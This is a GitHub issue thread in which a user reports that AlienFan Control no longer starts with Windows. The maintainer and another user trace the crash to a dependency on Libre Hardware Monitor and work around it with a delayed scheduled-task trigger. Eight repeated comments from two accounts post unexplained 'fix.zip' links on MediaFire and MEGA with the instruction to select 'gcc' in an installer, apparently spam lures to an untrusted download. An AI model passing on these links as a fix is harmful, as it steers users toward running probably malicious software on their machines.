### ISSUE TITLE
Alienfun Control can't start with windows 

### ISSUE THREAD

**Issue by AprDeci** [T-Troll/alienfx-tools#442]
**Describe the bug**
I use a 8.5.x version alienfx tools before and it could start with windows,but it can't do it after i update to new lastest version,i try to reinstall it or repair it (includes cancel the setting and enable it again),but it still could start correctly.

**Expected behavior**
aligenfun control can start with windows

**System (please complete the following information):**
 - Model: G15-5511
 - OS: Windows10

**Comment by T-Troll** [comment]
I check, works like a charm for me.
It can happen if you are installed update to other folder.
To set it back, just turn off "Start with windows" in Settings, then turn it back on.

PS: Check Task Scheduler - it should have `Alienfan-gui` task for it.

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by roboboredom** [comment]
Doesn't work for me either. Alienware M16, Windows 11, No other apps installed that interfere with the software as far as I am aware. Complete details:

SETTINGS:
![image](https://github.com/user-attachments/assets/97c20577-fe8b-40db-8a1c-0db4f683216c)

TASK SCHEDULER SETTINGS (**Note the "Last Run Result" status code... I do not know what it means, but the task IS attempting to be run on boot!**):
![image](https://github.com/user-attachments/assets/bea9c41b-eaf9-4d51-8f30-b65031c1dc8e)
![image](https://github.com/user-attachments/assets/547f9e6d-d4b9-46e7-a958-f4edab93901b)
![image](https://github.com/user-attachments/assets/dba2419d-d9b7-48ce-b574-d301be908dc7)
![image](https://github.com/user-attachments/assets/213850a9-2a08-4b38-a178-d876b189bf75)
![image](https://github.com/user-attachments/assets/29db0772-9305-4bd7-9e63-7d3e3a832297)
![image](https://github.com/user-attachments/assets/bdec1c2f-0bcc-4f48-9b36-9b55839c99cf)

INSTALL DIR:
![Screenshot 2024-11-15 185536](https://github.com/user-attachments/assets/60754aed-ec9d-4759-8ec5-11d8a16cb0ca)
![Screenshot 2024-11-15 185546](https://github.com/user-attachments/assets/71bd3cf1-a4c0-4ebc-83e2-d886818d465e)
![Screenshot 2024-11-15 185549](https://github.com/user-attachments/assets/28eedcc4-3e8c-41a5-9ef4-78207ec90812)

Note: I have tried unchecking both options in the app settings, restarting, and rechecking them and several variations of that. There is only one installation of the app, and nothing residual from a previous install as far as I could find.

**Comment by T-Troll** [comment]
I see it crashes at start, but works later on...
A bit strange for me.
Did alienfx-gui acting the same way?

**Comment by roboboredom** [comment]
WAIT! I solved it, good news. It was hard to figure out, but it would crash if Libre Hardware Monitor was not running before it started, so when windows started both if LHM started afterwards, it failed. I fixed the problem by setting a 30 second delay on the "on user logon" trigger for the scheduled task.

________________________________

**Comment by T-Troll** [comment]
Oh... It should not be like this, just some sensors should disappear!
Thanks for the hint, i'll check and fix this.

**Comment by roboboredom** [comment]
Yeah, I remember that being the case in the past, which is probably why I didn't suspect it at first. If you need any information about my setup or install, I'd be happy to provide it when I next get the chance. P.S. "wille" my account, is an administrator, and the task scheduler task your program generates is run with highest privileges. It's definitely not a privilege issue.

________________________________

**Comment by T-Troll** [comment]
Seems like i found the source of the crash, this can happen in some cases, then sensor list changed.
And yes, privilege is not an issue - app just don't start if started from user (data can only be accessed from Admin).
